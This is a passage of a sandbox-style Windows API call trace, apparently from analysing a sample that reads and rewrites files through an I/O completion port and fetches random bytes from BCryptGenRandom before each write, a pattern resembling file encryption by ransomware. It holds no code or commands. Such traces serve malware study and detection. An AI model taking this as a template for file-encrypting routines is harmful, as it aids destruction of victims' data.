CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.953] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0173.956] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3b2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.857] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x283c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0174.873] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.894] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x5150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0174.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.906] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.907] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0174.907] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.907] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.908] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0174.908] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.908] free (_Block=0x3e305b8) [0174.908] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.908] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0174.908] free (_Block=0x1fa91d0) [0174.909] free (_Block=0x1fa2ed8) [0174.909] free (_Block=0x1fa90b8) [0174.909] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.911] CloseHandle (hObject=0x308) returned 1 [0174.915] free (_Block=0x3ef0008) [0174.915] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.916] CloseHandle (hObject=0x338) returned 1 [0174.918] free (_Block=0x1ff1e60) [0174.918] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.939] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x15fe, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.940] CloseHandle (hObject=0x2a4) returned 1 [0174.941] free (_Block=0x1ff1e60) [0174.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.943] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2242, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0174.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0174.944] CloseHandle (hObject=0xec) returned 1 [0174.944] free (_Block=0x3df0008) [0174.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.023] CloseHandle (hObject=0x338) returned 1 [0175.023] free (_Block=0x3d70450) [0175.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.045] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2ea0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.046] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.047] CloseHandle (hObject=0x338) returned 1 [0175.047] free (_Block=0x3df0008) [0175.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.059] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4f72, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.060] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.061] CloseHandle (hObject=0x170) returned 1 [0175.061] free (_Block=0x1ff1e60) [0175.061] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.073] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f74, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.074] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.074] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0175.075] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.075] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0175.076] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.076] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.076] free (_Block=0x3e305b8) [0175.076] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.076] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.076] free (_Block=0x1fa91d0) [0175.076] free (_Block=0x1fa2ed8) [0175.076] free (_Block=0x1fa90b8) [0175.076] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.077] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.078] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.078] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.101] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3650, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.102] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.115] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4770, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.128] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd8e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.129] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.139] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x10cc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.139] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.167] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7a10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.168] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.207] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xbbe0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.218] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.232] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x934c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.247] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.262] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x51ea, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0175.277] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.289] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x27f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0175.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.329] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.329] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0175.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0175.330] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.330] free (_Block=0x3e305b8) [0175.330] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.330] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.330] free (_Block=0x1fa91d0) [0175.330] free (_Block=0x1fa2ed8) [0175.331] free (_Block=0x1fa90b8) [0175.331] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.332] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7050, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.401] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1544, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.402] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34afc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x34afc30) returned 0x0 [0175.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x34af970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x34af970) returned 0x0 [0175.415] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.415] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.415] free (_Block=0x3e305b8) [0175.415] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.415] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.415] free (_Block=0x1fa91d0) [0175.415] free (_Block=0x1fa2ed8) [0175.415] free (_Block=0x1fa90b8) [0175.415] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.831] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.832] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.843] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x5d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.861] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x184c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0175.874] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.888] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x16ee, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.900] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.912] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x28ae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0175.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.917] CloseHandle (hObject=0x170) returned 1 [0175.917] free (_Block=0x3f70048) [0175.917] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.918] CloseHandle (hObject=0x308) returned 1 [0175.918] free (_Block=0x3e70008) [0175.918] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.920] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.921] CloseHandle (hObject=0x2a4) returned 1 [0175.922] free (_Block=0x3df0008) [0175.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0175.926] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x41d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0175.926] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18) returned 1 [0176.156] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1710, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x34afc0c, lpCompletionKey=0x34afc1c, lpOverlapped=0x34afc18, 